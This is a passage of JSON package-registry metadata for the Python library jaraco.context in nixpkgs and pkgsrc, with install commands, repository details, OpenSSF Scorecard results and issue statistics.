araco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":4856,"html_url":null,"role":null,"created_at":"2026-03-09T04:09:44.467Z","updated_at":"2026-03-09T04:09:44.467Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3165},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-08-24T05:01:24.965Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":14527745,"name":"devel/py-jaraco.context","ecosystem":"pkgsrc","description":"Context managers","homepage":"https://github.com/jaraco/jaraco.context","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["devel","python"],"namespace":"devel","versions_count":1,"first_release_published_at":"2026-03-19T05:43:54.000Z","latest_release_published_at":"2026-03-19T05:43:54.000Z","latest_release_number":"6.1.1","last_synced_at":"2026-08-01T22:13:35.421Z","created_at":"2026-05-27T06:39:07.996Z","updated_at":"2026-08-06T19:26:18.311Z","registry_url":"https://pkgsrc.se/devel/py-jaraco.context","install_command":"pkg_add py311-jaraco.context","documentation_url":"https://pkgsrc.se/devel/py-jaraco.context","metadata":{"pkg_slug":"py-jaraco.context","pkgbase":"py311-jaraco.context","machine_arch":"x86_64","opsys":"NetBSD","pkgname_latest":"py311-jaraco.context-6.1.1"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.311Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:pkgsrc/devel/py-jaraco.context?arch=x86_64\u0026os=NetBSD","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pkgsrc/devel/py-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pkgsrc/devel/py-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pkgsrc/devel/py-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages/devel%2Fpy-jaraco.context/codemeta","maintainers":[],"registry":{"name":"pkgsrc-netbsd-x86_64-10.1-all","url":"https://cdn.netbsd.org/pub/pkgsrc/packages/NetBSD/x86_64/10.1/All","ecosystem":"pkgsrc","default":true,"packages_count":19690,"maintainers_count":0,"namespaces_count":43,"keywords_count":368,"github":"pkgsrc","metadata":{"funded_packages_count":479},"icon_url":"https://github.com/pkgsrc.png","created_at":"2026-05-26T08:59:24.518Z","updated_at":"2026-08-24T05:00:24.175Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pkgsrc-netbsd-x86_64-10.1-all/namespaces"}},{"id":12815867,"name":"python310Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T17:12:05.787Z","latest_release_published_at":"2026-01-26T17:12:05.787Z","latest_release_number":"4.3.0","last_synced_at":"2026-08-01T22:02:59.214Z","created_at":"2026-01-26T17:12:05.623Z","updated_at":"2026-08-06T19:26:18.330Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python310Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python310Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/jaraco-context/default.nix#L40","metadata":{"nix_attribute":"python3.10-jaraco-context-4.3.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:40","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.330Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python310Packages.jaraco-context?channel=23.05\u0026repository_url=https://channels.nixos.org/nixos-23.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python310Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python310Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python310Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-23.05/packages/python310Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixp